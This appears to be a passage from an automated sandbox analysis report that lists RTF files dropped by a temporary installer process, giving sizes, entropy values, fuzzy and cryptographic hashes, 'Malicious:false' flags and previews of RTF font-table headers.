                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38881
                                                                                                                                                                                                                                                          Entropy (8bit):5.021685226499464
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jnTmrRl+4AnbIWIRV9u6KSsouXIhUGD+hZCZHHuJfD:jnIZNkfD
                                                                                                                                                                                                                                                          MD5:C105B94880EE7C216A6B9CB11680EE5F
                                                                                                                                                                                                                                                          SHA1:DB8A5F0969428FC77D619742CF14E733281491EE
                                                                                                                                                                                                                                                          SHA-256:1F56475447CBCFC209E9BC0BEF763423EA52CDBC4EBB989EC592025C907C8EAF
                                                                                                                                                                                                                                                          SHA-512:18D9F4336DCD746E374B70D297F5F555745CCBFCDE08689B50BEF3C2CD7A7714867F747472240EE195161142C3DC8A93C985FE6D8D66D7F46878C25B45D99A67
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \fnil\fcharset134\fprq2{\*\panose 0201
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46478
                                                                                                                                                                                                                                                          Entropy (8bit):5.035284697457925
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jFTmHRlr4QogJAqxAUZ81f4igFt5hCteYHIGdLN1Ho3SShcYZVVkiikVi/nuAIRD:jFuqNkfh
                                                                                                                                                                                                                                                          MD5:7EA6627CEC93F45827C17C30BFE21F60
                                                                                                                                                                                                                                                          SHA1:BA5C79789734B4CD143BAAE12DECE8C07FD18427
                                                                                                                                                                                                                                                          SHA-256:6FFBE7F2A89F1128FA7A950F7B1797E2B73E70839FB7EB79EE5B906C50CB8665
                                                                                                                                                                                                                                                          SHA-512:D8C7ED9808A9045B0BE3D247C06F81FB5563F86DAAC704EB1D056AF0799716B6FA0470D81698F28EE72C5B937E0825F1CE42A9F354CA4C61173A0E72DFCB79ED
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}..{\fbimajor\f31503\fbidi \f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43011
                                                                                                                                                                                                                                                          Entropy (8bit):5.033750943906381
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jaOfIRll4ugJAqxAUZm25iMSf3Tv5itocjSzFkkqYrMOFAPZ/HuJctS:japiZkoS
                                                                                                                                                                                                                                                          MD5:F7FE0658461246679F5FD2A30AF4F9AE
                                                                                                                                                                                                                                                          SHA1:878199CEF5C2AB4748658880B8A9302CF754216D
                                                                                                                                                                                                                                                          SHA-256:D65035962FAF4E5AEC76B8EB56E186E14907CD955511B21F2E212CF706F08940
                                                                                                                                                                                                                                                          SHA-512:A9232C63302DCB47FD8A53DEF4A5B6A8BAAC23766F98D8051751B3AB4A12F9F1D12644DE7E5E5AC897506D7C33FA2803E3FDC241457F3F925EEB42CC6384D874
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fchar
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47337
                                                                                                                                                                                                                                                          Entropy (8bit):5.026858098463381
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:xaOfIRjZyPCtqICnfLBOHjiqlO8DTO+6X9MsHEW71vUGF87etnC+zc7R+ezr21gQ:xapnVMNkfS
                                                                                                                                                                                                                                                          MD5:F4E08AB548997A7569D407BF6945FF93
                                                                                                                                                                                                                                                          SHA1:374C962B0AD68A101B3DAED59995A904FD2366DF
                                                                                                                                                                                                                                                          SHA-256:5F43BA173258F401DEBA2C385FC136464F11F0BF9C9122D5CB1EDDBBA356D24F
                                                                                                                                                                                                                                                          SHA-512:9F6F81663CCC54ED4B6E57770247EBDE16327C46ACFE14EF01BC3CF1172D9647AFDBED40FA59115DD41BA746428368A34C4307AA4D7B0093C88D86F8C4BAA982
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset2
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38875
                                                                                                                                                                                                                                                          Entropy (8bit):5.023304885435034
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qMF2weYDc4L7bIWIRV9uUwcpanBczRyZHHuJfv:qM3ZxNkfv
                                                                                                                                                                                                                                                          MD5:AA188680DBFDD29FCFD5767CFC4533D9
                                                                                                                                                                                                                                                          SHA1:3CF7AC902EE42B074B4B5ED13E4529FD11A34ADD
                                                                                                                                                                                                                                                          SHA-256:CC3FA96A625899F9221F3E76B6AB9C7B234DC7A4222C914EC9A78A7AA2D64825
                                                                                                                                                                                                                                                          SHA-512:76C22CF016FF8C7C1122E5738FDCF79957D24A4590EAD2FE570CA833D1CF828F8B333CD105B2078AEF2032C503C03BC2536290E5302417D383889045E3B84817
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0302020204030204}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):55605
                                                                                                                                                                                                                                                          Entropy (8bit):5.01205567474232
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:joOfxRl14hJboyQZFJiMJu8WjbvMuhisSnPLQStqICnfLrajKyISfle0anZf1L3v:joQxkONkfp
                                                                                                                                                                                                                                                          MD5:2042C1CEA9DAB7F908912F3BFDF63E63
                                                                                                                                                                                                                                                          SHA1:5584A50BCAF968B5EC85B230E9043456D38C8222
                                                                                                                                                                                                                                                          SHA-256:D67F0917369F9D4C556E2F625566C239FEE4DDB6AEF1483DCB2556F23DD3785B
                                                                                                                                                                                                                                                          SHA-512:B0C961BA725096E33D3B586951221A35A77A56D63E0003C301AD30F6D6DB94DF6853124EFE7FE8817F7EEF9F7972434AFC65010885BCE4A9BEFB60D7FF9A5679
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42824
                                                                                                                                                                                                                                                          Entropy (8bit):5.034062607884397
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jFTmHRlU4U7bIWIRV9pqHjiqlO8Dxg+uoH6ewDiUpk8q8l9kSZHHuJfo:jFulNkfo
                                                                                                                                                                                                                                                          MD5:800E7AD84A7B41C281A79786FEA7BA97
                                                                                                                                                                                                                                                          SHA1:994E9061F0AC0F8D5A34B5456B3CB580216F08F6
                                                                                                                                                                                                                                                          SHA-256:6D4DC10220486F098944FBCE97F8B5D03DA6157F7B59F79AF697D60AEDBDAC82
                                                                                                                                                                                                                                                          SHA-512:887318DB58E88701D2B34B7E894EE2132684D0E3C724BC1B6EBA83C5987ECC1D7984018C8915AD0E7EE63E46C8C4258D7F286D2CE804DDFB37289F37676EB5F8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}..{\fbimajor\f31503\fbidi \f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43011
                                                                                                                                                                                                                                                          Entropy (8bit):5.033750943906381
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jaOfIRll4ugJAqxAUZm25iMSf3Tv5itocjSzFkkqYrMOFAPZ/HuJctS:japiZkoS
                                                                                                                                                                                                                                                          MD5:F7FE0658461246679F5FD2A30AF4F9AE
                                                                                                                                                                                                                                                          SHA1:878199CEF5C2AB4748658880B8A9302CF754216D
                                                                                                                                                                                                                                                          SHA-256:D65035962FAF4E5AEC76B8EB56E186E14907CD955511B21F2E212CF706F08940
                                                                                                                                                                                                                                                          SHA-512:A9232C63302DCB47FD8A53DEF4A5B6A8BAAC23766F98D8051751B3AB4A12F9F1D12644DE7E5E5AC897506D7C33FA2803E3FDC241457F3F925EEB42CC6384D874
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fchar
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):47415
                                                                                                                                                                                                                                                          Entropy (8bit):5.015734147683168
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jnTmY+EN4mXbIWIRV9sK8qoZzNqZiuJo8cDovLQoAn3Brxw2mB+c37DWZlIpIkpU:jnciZhNkfY
                                                                                                                                                                                                                                                          MD5:A7A6E83C7BF0C9446D815E04CB208372
                                                                                                                                                                                                                                                          SHA1:793D0F666A6E771A4864B169BBE282F943D5D043
                                                                                                                                                                                                                                                          SHA-256:B5323857EF076CBEBD3B870F4C8EB5C58B968ED51ACB6821C0A93C2FFE53A1AB
                                                                                                                                                                                                                                                          SHA-512:A5B09DD7D7C362B1807F6B9216318AA3598943688EFA39D4E15DB49DCE7743C9DC2574DC182BFCCFBB3501A7A1273A073FC97F8BC714084806B16DC8F43B49F5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang1049\deflangfe2052\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}{\f34\fbidi \froman\fcharset1\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}{\fhimajor\f31502\fbidi \fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Calibri Light;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \fnil\fcharset134\fprq2{\*\panose 0201
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49143
                                                                                                                                                                                                                                                          Entropy (8bit):5.0303602087233
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qOF2w9Rll41gJAqxAUZ2ipwQduXLwzq3PtDxdMNzx9AW94V2sQSuUNKKLz5cZecD:qOhKZkos
                                                                                                                                                                                                                                                          MD5:45FFBE8D6F213774FC03CED4B2C6DE2F
                                                                                                                                                                                                                                                          SHA1:B206C836CD793CB43A90FB7F55F20BCD0E588F45
                                                                                                                                                                                                                                                          SHA-256:D4928483BCC0FF7D15BD5B6B6669B82645EA4EC7C454A1F3BCDAFE0E984466BF
                                                                                                                                                                                                                                                          SHA-512:3153444C8413A6E6F6B4B1D0603E18D282A1B5DCAAC064FEFF2F8D9CF63AF5C7F7DDFBC77F26789384FF0E056741C615158570FD0B65114CE493692516316086
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharse
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):61874
                                                                                                                                                                                                                                                          Entropy (8bit):5.01308589618829
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qOF2whYDh4GQgJAqxAUZ8ipwQduXyufTM3wEmgIqvNNb+S/5lqmhIFBjMpVWH3WA:qOQxqiBXZko0
                                                                                                                                                                                                                                                          MD5:149EB3F389063EE27E719BA447DAD74E
                                                                                                                                                                                                                                                          SHA1:1A4BF26BB1082D14EFDE795E2EC0E2357F0A3E74
                                                                                                                                                                                                                                                          SHA-256:61576A27746879AC99F0F0A588FA18BD49A62908A3EF1CBD0446F3F3D18CD0FD
                                                                                                                                                                                                                                                          SHA-512:F72E59E3935176D0D8E659F64FB344EBAE43928C7F53633160E8D7F34F2EAA0C9C738EE0DC87F14E1C35D822BB0B3247C3F427FF657F97C0E73463C116D29799
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1046\themelangfe2052\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt \'cb\'ce\'cc\'e5};}..{\fhimajor\f31502\fbidi \fswiss\fcharse
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38881
                                                                                                                                                                                                                                                          Entropy (8bit):5.021685226499464
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:jnTmrRl+4AnbIWIRV9u6KSsouXIhUGD+hZCZHHuJfD:jnIZNkfD
                                                                                                                                                                                                                                                          MD5:C105B94880EE7C216A6B9CB11680EE5F
                                                                                                                                                                                                                                                          SHA1:DB8A5F0969428FC77D619742CF14E733281491EE
                                                                                                                                                                                                                                                          SHA-256:1F56475447CBCFC209E9BC0BEF763423EA52CDBC4EBB989EC592025C907C8EAF
                                                                                                                                                                                                                                                          SHA-512:18D9F4336DCD746E374B70D297F5F555745CCBFCDE08689B50BEF3C2CD7A7714867F747472240EE195161142C3DC8A93C985FE6D8D66D7F46878C25B45D99A67
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
